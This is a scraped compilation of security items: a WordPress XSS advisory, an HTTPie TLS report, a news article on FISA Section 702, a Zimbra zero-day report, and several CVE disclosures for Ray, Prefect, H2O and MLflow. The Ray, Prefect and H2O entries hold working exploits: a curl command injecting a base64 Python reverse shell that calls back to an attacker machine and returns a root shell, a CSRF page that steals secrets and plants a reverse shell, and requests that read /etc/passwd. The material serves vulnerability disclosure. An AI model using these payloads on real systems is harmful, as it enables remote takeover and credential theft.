Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in lawrenceowen, gcubero, acunnningham, fmahmood Star CloudPRNT for WooCommerce plugin <= 2.0.3 versions.

**Solution**

 No fix

No patched version is available.

Le Ngoc Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Star CloudPRNT for WooCommerce Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 1 present

 1 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47514: WordPress Star CloudPRNT for WooCommerce plugin <= 2.0.3 - Cross Site Scripting (XSS) vulnerability - Patchstack

Missing SSL certificate validation in HTTPie v3.2.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack.

\# Cryptographic API Misuse Vulnerability : Missing SSL Certificate Validation Do not use unverified hostname or certificates in connection Do not disable HTTPS warnings ### Description: In the HTTPie 3.2.2 , there are sections where SSL certificate validation appears to be missing. Proper SSL certificate validation is a cornerstone of secure communication over HTTPS, and its absence can lead to severe security risks such as Man-In-The-Middle (MITM) attacks. In particular, the code does not enforce hostname verification or certificate validation, and it may also be suppressing HTTPS-related warnings that would typically alert a user to a potential security issue. ### Affected Version v3.2.2 ### Location: https://github.com/httpie/cli/blob/master/httpie/internal/update\_warnings.py#L44 https://github.com/httpie/cli/blob/master/httpie/client.py#L33 ### Reference - CWE-295: Improper Certificate Validation - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor - CWE-319: Cleartext Transmission of Sensitive Information ### Expected Behavior: The expected behavior for any HTTPS connection is that the client should validate the SSL certificate provided by the server to ensure it is trusted, not expired, and matches the requested hostname. Additionally, any HTTPS warnings should be displayed to the user, rather than being disabled, to avoid security oversights. ### Actual Behavior: The actual behavior observed in the code indicates that SSL certificate validation may not be properly enforced. Furthermore, HTTPS warnings that are essential for debugging and security awareness are not displayed, potentially causing the users to remain unaware of misconfigured or insecure SSL implementations. ### Recommendation - Do not use \`urllib3.disable\_warnings()\` to close tls warning , it is so dangerous! Please delete it. - Set get request \`verify=True\` ,it will do ssl certificate validation. Due to the sensitive nature of data transmitted over HTTPS, it is imperative to address this vulnerability promptly to maintain the integrity and confidentiality of client-server communication for HTTPie users.

CVE-2023-48052

A new report by an oversight committee in the US House of Representatives says the FBI has routinely violated rules governing FISA’s Section 702 surveillance program and must be reined in.

A report compiled by the Republican majority members of the US House Intelligence Committee says that agents of the Federal Bureau of Investigation should be required under the law to obtain a “probable cause warrant” before scouring the database of a controversial foreign intelligence surveillance program for information related to domestic crimes.

The Section 702 program, authorized under the Foreign Intelligence Surveillance Act (FISA), has a history of being abused by the FBI, the Intelligence Committee says, necessitating a “complete review” of the program and “the enactment of meaningful reforms.”

The program, which targets the communications of foreigners overseas with the compulsory assistance of US telecom providers, has been the target of significant scrutiny on Capitol Hill, with federal lawmakers frequently airing concerns about its capacity to be turned against the American public, whose texts, emails, and internet calls are collaterally intercepted by the US National Security Agency in unknown quantities each year.

The Intelligence Committee report, first obtained by WIRED, labels the program as essential to combating nuclear proliferation and thwarting terror attacks, adding that it has also been employed successfully in investigations of ransomware targeting US infrastructure, war crimes by Russian soldiers in Ukraine, and the “malign investments” of hostile actors that pose key economic security risks to the United States and its allies.

Still, the program, according to the committee's majority party, has been “abused by those who swore to support and defend the American people—in particular, the FBI.”

“Our report outlines reforms necessary for FISA's reauthorization," says representative Mike Turner, the Intelligence Committee's chair, while claiming the US is currently “at its greatest risk of a terrorist attack in nearly a decade.” Adds Turner: “We cannot afford to let this critical national security tool expire.”

In total, the House Intelligence Committee lists 45 “improvements” that it wishes to include in coming legislation that would enable the 702 program to continue, including criminal liability for 702 leaks involving an American's communications; enhanced penalties for federal employees who violate FISA procedures; and a new court-appointed counsel able to scrutinize FISA application by the government aimed at surveillance of a US citizen.

The report was finalized by a working group composed of three Republican members: Turner, who hails from Ohio, and representatives Darin LaHood and Brian Fitzpatrick of Illinois and Pennsylvania, respectively. The working group stresses that federal courts have time and again ruled the 702 program constitutional—when its procedures are not skirted by negligent employees and willful violators for nefarious or self-serving means.

The FBI and the Biden administration at large have lobbied Congress to reauthorize the 702 program as is, ignoring calls for reform that have grown louder since the beginning of the year, manifesting this month in the form of a comprehensive privacy bill—the Government Surveillance Reform Act—legislation that likewise seeks to impose warrant requirements on the FBI, which at present can conduct searches of 702 data without a judge's consent, so long as it's “reasonably likely” to find evidence of a crime.

FBI director Christopher Wray, speaking before the House Homeland Security Committee on Wednesday, denounced plans to impose a warrant requirement under 702, calling it a “significant blow” to the bureau's national security division.

“A warrant requirement would amount to a de facto ban,” Wray says, noting the FBI would often be unable to meet the legal standard necessary for the court's approval, and that the processing of warrants would take too long in the face of “rapidly evolving threats.”

The report goes on to detail “significant” violations at the FBI, most previously reported to the Foreign Intelligence Surveillance Court (FISC) in 2022, before they were made known to the public in May. The majority of the incidents—including one in which an FBI analyst conducted “batch queries of over 19,000 donors to a congressional campaign”—took place prior to a package of “corrective reforms” that the FBI is crediting with practically curing its compliance issues.

The report attributes “most” misuses of 702 data to “a culture at the FBI” wherein access was granted to many “poorly trained” agents and analysts with few internal safeguards. As one example, it states that FBI systems for storing 702 data had not been designed to make employees “affirmatively opt-in” before conducting a query, “leading to many inadvertent, noncompliant” issues of the system. “It also seems that FBI management failed to take query compliance incidents seriously,” the report says, “and were slow to implement reforms that would have addressed many of the problems.”

Nevertheless, the committee says the FBI “realized the depth and breadth of its issues” and has begun implementing serious reforms on its own—including, among other measures, additional guidance for employees, ample system modifications, and heightened oversight in the form supervisory reviews by FBI legal experts and senior executives. The committee, nonetheless, notes that the FISC—albeit somewhat “encouraged” by recent improvements—has found the bureau's noncompliance with 702 procedures “persistent and widespread,” warning that it may become necessary to significantly curtail its employees' access to raw foreign intelligence in the future.

“The FBI has a history of abuse regarding the querying of Section 702 information,” the report says, adding that reforms soon to be advanced by the intel committee would see the number of FBI employees with access to the data cut by as much as 90 percent.

Citing “insufficient oversight and supervision” at the FBI, the committee says it should be prepared to audit every query targeting a US person “within 6 months” of the search, and House and Senate leaders should be notified at once when and if an FBI analyst queries a term that might "identify a member of Congress.”

“The American people deserve a law that protects them from both governmental overreach and security threats,” the report says. “Section 702 must be reauthorized, but it also must be reformed.”

US Congress Report Calls for Privacy Reforms After FBI Surveillance 'Abuses'

A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.

**Description**

The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned:

**Proof of Concept**

For this proof of concept, the attacker machine is 192.168.200.177 and the victim Ray dashboard is 192.168.200.204.

****Victim Ray dashboard ray_dashboard.py (192.168.200.204)****

    #!/usr/bin/env python3
    import ray
    context = ray.init(dashboard_host="0.0.0.0")
    print(context.dashboard_url)
    

and run like so:

    python3 -i ray_dashboard.py
    

****Attacker machine (192.168.200.177)****

    user@attacker:~$ nc -lvvp 4444 &
    Listening on 0.0.0.0 4444
    # python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.177",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' == cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn
    user@attacker:~$ curl 'http://192.168.200.204:8265/worker/cpu_profile?pid=3354&ip=192.168.200.204&duration=5&native=0&format=`echo%20cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn|base64$IFS-d|sudo%20sh`'
    Connection received on 192.168.200.204 57436
    # id
    uid=0(root) gid=0(root) groups=0(root)
    # whoami
    root
    # hostname
    ray
    

**Impact**

Exploiting this vulnerability allows for a complete remote compromise of the system running the Ray dashboard, including model theft & alteration, total data compromise, and persistent access to an attacker. Ray has specific setup cases for setup with a passwordless sudo, giving the attacker root access. If Ray is not configured for passwordless sudo, the attacker will receive access in the same account the dashboard was run. Both allow for model model theft & alteration, total data compromise, and persistent access to an attacker.

**Occurrences**

profile\_manager.py L86-L114

This is the vulnerable function containing the unverified format parameter. Allow-listing this to a boolean, known good values, or a highly filtered string type will fix this vulnerability

CVE-2023-6019: Code injection in cpu_profile format parameter in ray

An attacker is able to steal secrets and potentially gain remote code execution via CSRF using the Prefect API.

**Description**

If you are running the dashboard locally there is no csrf/cors/no auth and therefore you are vulnerable to cross site request forgeries. Worse yet, the service is almost certainly at 127.0.0.1:4200, reducing any need for recon or brute force. CSRF/cors/lack of auth is also likely to be a issue on self hosted instances based on the lack of documentation about how to configure auth to function similar to the cloud version.

**Proof of Concept**

    <!doctype html>
    
    <html lang="en">
    
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Prefect cross site request POC</title>
        <meta name="author" content="Joshua Bonnett">
        <meta property="og:title" content="Prefect cross site request POC">
        <meta property="og:description" content="A simple poc for prefect block data extraction ">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.0/jquery.min.js"></script>
    </head>
    
    <body>
        <hr />
        <h1> Stolen Block content:</h1>
        <div class="block_content"> </div>
        <h1> Stolen Artifact content:</h1>
        <hr />
        <div class="artifacts"> </div>
        <hr />
        <h1> Stolen variable content:</h1>
        <hr />
        <div class="vars"> </div>
        <hr />
        <h1> Notes:</h1>
        Note that this wasn't sent anywhere, but it easily could have been sent with a second post to a server of my
        choosing, and it need not be on its own page, it could be in a ad, 10 iframes deep on a common watering hole site.
    
        Recommendation: actually enforce csrf header requirements, get rid of the "include_secrets" api flag.
        <script>
    
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.block_content').html(y));
    
            fetch("http://127.0.0.1:4200/api/artifacts/latest/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.artifacts').html(y));
            fetch("  http://127.0.0.1:4200/api/variables/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.vars').html(y));
    
            //***** Find process blocks and change them****//
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.json()).then(function (data) {
                data.forEach(element => {
                    if (element.block_type.name == "Process") {
                        fetch("http://127.0.0.1:4200/api/block_documents/" + element.id, {
                            "headers": {
                                "accept": "application/json, text/plain, */*",
                                "accept-language": "en-US,en;q=0.9",
                                "cache-control": "no-cache",
                                "content-type": "application/json",
                                "pragma": "no-cache",
                                "sec-ch-ua-mobile": "?0",
                                "sec-ch-ua-platform": "\"Linux\"",
                                "sec-fetch-dest": "empty",
                                "sec-fetch-mode": "cors",
                                "sec-fetch-site": "same-origin",
                                "sec-gpc": "1",
                                "x-prefect-ui": "true"
                            },
                            "referrer": "http://127.0.0.1:4200/blocks/block/e3129574-2094-4411-a685-5c327a0201df/edit",
                            "body": "{\"data\":{\"command\":[\"python\", \"-c\", \"import base64,sys;exec(base64.b64decode(sys.argv[1]))\", \"aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTI3LjAuMC4xIiw5MDAxKSk7W29zLmR1cDIocy5maWxlbm8oKSxmKWZvciBmIGluKDAsMSwyKV07cHR5LnNwYXduKCJzaCIp\"], \"stream_output\":true}, \"merge_existing_data\":false}",
                            "method": "PATCH"
                        });
                    }
                });
            });
        </script>
    </body>
    
    </html>
    

**Impact**

Stealing or changing secrets from blocks(example: aws creds, azur cred blocks) Stealing or changing variables inputs from blocks/variables(example: remote file block,) Stealing any output data from artifacts(Example: output from ml runs)

Reverse shell is possible by changing any existing Process blocks to a reverse shell (set to localhost port 9001 in the Poc, but I could have it connect back over the internet), triggers when a flow that uses that block runs. I could add code to trigger a quick run on all flows to ensure connect back shell happens immediately but I leave that to the reader.

A very similar effect could happen within the docker container, Azure Container Instance Job, ECS Task, GCP Cloud Run Job and Kubernetes Job blocks if they are configured. I didn't include them in the poc because of the complexity of setting them up in my dev env, but adapting the poc to each of these block types would be very simple.

I would recommend moving the configuration of those block types into flow code where it isnt updateable from the web, and it can be managed like code.

**Occurrences**

server.py L560

It is worth setting some limits in cors by default, it is a shame to have the middleware but have it wide open.

block\_documents.py L80

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

block\_documents.py L52

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

CVE-2023-6022: Can use csrf to steal/modify block content, artifact content, variables possibly leading to RCE when the dashboard is running on a developers workstation in prefect

An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.

**Description**

Local file include in h2o-3 REST API. Unauthenticated, remote, no user interaction, default installation.

**Proof of Concept**

Start the h2o-3 API with:

    cd h2o-3.40.0.4
    java -jar h2o.jar
    

Then make these curl requests:

    curl -i -s -k -X $'GET' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        $'http://127.0.0.1:54321/3/ImportFiles?path=%2Fetc%2Fpasswd'
    

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:54321' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 50' -H $'Origin: http://127.0.0.1:54321' -H $'Connection: close' -H $'Referer: http://127.0.0.1:54321/flow/index.html' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D' \
        $'http://127.0.0.1:54321/3/ParseSetup'
    

The response:

    HTTP/1.1 200 OK
    Connection: close
    Date: Thu, 08 Jun 2023 15:10:27 GMT
    Cache-Control: no-cache
    X-h2o-build-project-version: 3.40.0.4
    X-h2o-rest-api-version-max: 3
    X-h2o-cluster-id: 1686167537026
    X-h2o-cluster-good: true
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' 'unsafe-eval' 'unsafe-inline'; img-src 'self' data:
    Content-Type: application/json
    Content-Length: 1457
    
    {"__meta":{"schema_version":3,"schema_name":"ParseSetupV3","schema_type":"ParseSetup"},"_exclude_fields":"","source_frames":[{"__meta":{"schema_version":3,"schema_name":"FrameKeyV3","schema_type":"Key<Frame>"},"name":"nfs://etc/passwd","type":"Key<Frame>","URL":"/3/Frames/nfs://etc/passwd"}],"parse_type":"CSV","separator":32,"single_quotes":false,"check_header":-1,"column_names":null,"skipped_columns":null,"column_types":["String","Enum"],"na_strings":null,"column_name_filter":null,"column_offset":0,"column_count":0,"destination_frame":"passwd.hex","header_lines":0,"number_columns":2,"data":[["nobody:*:-2:-2:Unprivileged","User:/var/empty:/usr/bin/false"],["root:*:0:0:System","Administrator:/var/root:/bin/sh"],["daemon:*:1:1:System","Services:/var/root:/usr/bin/false"],["fakeuser:*:99:99:Fake","User:/Users/danmcinerney/fakeuser:/bin/sh"],["_uucp:*:4:4:Unix","to","Unix","Copy","Protocol:/var/spool/uucp:/usr/sbin/uucico"],["_taskgated:*:13:13:Task","Gate","Daemon:/var/empty:/usr/bin/false"],["_networkd:*:24:24:Network","Services:/var/networkd:/usr/bin/false"],["_installassistant:*:25:25:Install","Assistant:/var/empty:/usr/bin/false"],["_lp:*:26:26:Printing","Services:/var/spool/cups:/usr/bin/false"],["_postfix:*:27:27:Postfix","Mail","Server:/var/spool/postfix:/usr/bin/false"]],"warnings":null,"chunk_size":4194304,"total_filtered_column_count":2,"custom_non_data_line_markers":null,"decrypt_tool":null,"partition_by":null,"escapechar":0}
    

Developers have been contacted 06/08/2023:

    H2O Support
        
    Wed, Jun 7, 4:32 PM (18 hours ago)
        
    to me
    
    Dear Dan McInerney,
    
    We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
    Your ticket id is :  [#105551] 
    
    
    To view the status of the ticket or add comments, please visit
    https://support.h2o.ai/helpdesk/tickets/105551
    
    Your problem description is as below:
    
    The h2o-3 API has an LFI. You can read any file on the filesystem with import and parse commands. By default the API initializes without authentication and is remotely accessible to anyone on the local network, or the world at large if the user publicly exposed the endpoint.
    
    
    
    
    
    Ticket attachments : 1. lfi id rsa.png
    2. Screenshot 2023-06-07 at 4.31.34 PM.png
    
    
    Thank you for your patience.
    
    Sincerely,
    H2O.ai Support Team
    

**Impact**

Remotely accessing every file on the API server with the permissions of the user who ran the command.

**Occurrences**

CVE-2023-6038: LFI in h2o-3 API in h2o-3

H2O included a reference to an S3 bucket that no longer existed allowing an attacker to take over the S3 bucket URL.

**Description**

During a source code review of the provided script, it has been identified that the code contains the "h20-r" S3 bucket, which was previously unclaimed and taken over for proof-of-concept (PoC) purposes. This unauthorized takeover introduces security risks including unauthorized access and potential content modification.

**Steps To Reproduce:**

1.  Create a s3 bucket with name h20-r and us east 1 region
2.  Upload files with the name same as given in the code (e.g. LiblineaR\_1.94-2.tar.gz)
3.  Make the settings and change it as a static website
4.  You have successfully taken the s3 bucket and now when any user runs the code the url with s3 get executed and an attacker can spread dangerous malware.

**Proof of Concept**

1.  POC Link for the s3 bucket takeover :- https://h2o-r.s3.amazonaws.com/index.html
2.  Github link that shows the s3 bucket :- https://github.com/h2oai/h2o-3/blob/918af06003ef8e56db51669401fc0e7dad046f99/docker/setup-h2o-dev.sh#L51

**Impact**

The unauthorized takeover of the "h20-r" S3 bucket introduces the following potential impacts:

Unauthorized Access: The unauthorized modification of the S3 bucket allows unauthorized individuals to access the bucket's contents, potentially leading to data leakage or unauthorized usage.

Content Modification: Since the bucket's content has been changed, any code, files, or data retrieved from the bucket may be malicious or untrustworthy. This could lead to unintended code execution on systems that rely on the content from this bucket.

Supply Chain Attack: By altering the original content in the S3 bucket, an attacker could perform a supply chain attack. Users executing the script may unknowingly install malicious or compromised versions of packages, introducing security vulnerabilities.

**Occurrences**

CVE-2023-6017: Unauthorized Access and Content Modification in h20-r S3 Bucket which is used in .sh and docker file leads to spread of malicious R package which can lead to remote code execution in h2o-3

LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.

**Description**

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

**Proof of Concept**

    GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: text/plain
    Date: Thu, 24 Aug 2023 21:49:54 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    Content-Length: 8225
    
    1##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    

**Impact**

Allows attackers to remotely read any file on the system depending on the permissions of the user that started Ray.

**Occurrences**

CVE-2023-6021: LFI in Ray API in ray

An attacker can overwrite any file on the server hosting MLflow without any authentication.

CVE-2023-6018

A zero-day flaw in the Zimbra Collaboration email software was exploited by four different groups in real-world attacks to pilfer email data, user credentials, and authentication tokens.
"Most of this activity occurred after the initial fix became public on GitHub," Google Threat Analysis Group (TAG) said in a report shared with The Hacker News.
The flaw, tracked as CVE-2023-37580 (CVSS score:

Vulnerability / Email Security

A zero-day flaw in the Zimbra Collaboration email software was exploited by four different groups in real-world attacks to pilfer email data, user credentials, and authentication tokens.

"Most of this activity occurred after the initial fix became public on GitHub," Google Threat Analysis Group (TAG) said in a report shared with The Hacker News.

The flaw, tracked as CVE-2023-37580 (CVSS score: 6.1), is a reflected cross-site scripting (XSS) vulnerability impacting versions before 8.8.15 Patch 41. It was addressed by Zimbra as part of patches released on July 25, 2023.

Successful exploitation of the shortcoming could allow execution of malicious scripts on the victims' web browser simply by tricking them into clicking on a specially crafted URL, effectively initiating the XSS request to Zimbra and reflecting the attack back to the user.

Google TAG, whose researcher Clément Lecigne was credited with discovering and reporting the bug, said it discovered multiple campaign waves starting June 29, 2023, at least two weeks before Zimbra issued an advisory.

Three of the four campaigns were observed prior to the release of the patch, with the fourth campaign detected a month after the fixes were published.

The first campaign is said to have targeted a government organization in Greece, sending emails containing exploit URLs to their targets that, when clicked, delivered an email-stealing malware previously observed in a cyber espionage operation dubbed EmailThief in February 2022.

The intrusion set, which Volexity codenamed as TEMP\_HERETIC, also exploited a then-zero-day flaw in Zimbra to carry out the attacks.

The second threat actor to exploit CVE-2023-37580 is Winter Vivern, which targeted government organizations in Moldova and Tunisia shortly after a patch for the vulnerability was pushed to GitHub on July 5.

It's worth noting that the adversarial collective has been linked to the exploitation of security vulnerabilities in Zimbra Collaboration and Roundcube by Proofpoint and ESET this year.

TAG said it spotted a third, unidentified group weaponizing the bug before the patch was pushed on July 25 to phished for credentials belonging to a government organization in Vietnam.

"In this case, the exploit URL pointed to a script that displayed a phishing page for users' webmail credentials and posted stolen credentials to a URL hosted on an official government domain that the attackers likely compromised," TAG noted.

Lastly, a government organization in Pakistan was targeted using the flaw on August 25, resulting in the exfiltration of the Zimbra authentication token to a remote domain named "ntcpk\[.\]org."

Google further pointed out a pattern in which threat actors are regularly exploiting XSS vulnerabilities in mail servers, necessitating that such applications are audited thoroughly.

"The discovery of at least four campaigns exploiting CVE-2023-37580, three campaigns after the bug first became public, demonstrates the importance of organizations applying fixes to their mail servers as soon as possible," TAG said.

"These campaigns also highlight how attackers monitor open-source repositories to opportunistically exploit vulnerabilities where the fix is in the repository, but not yet released to users."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#auth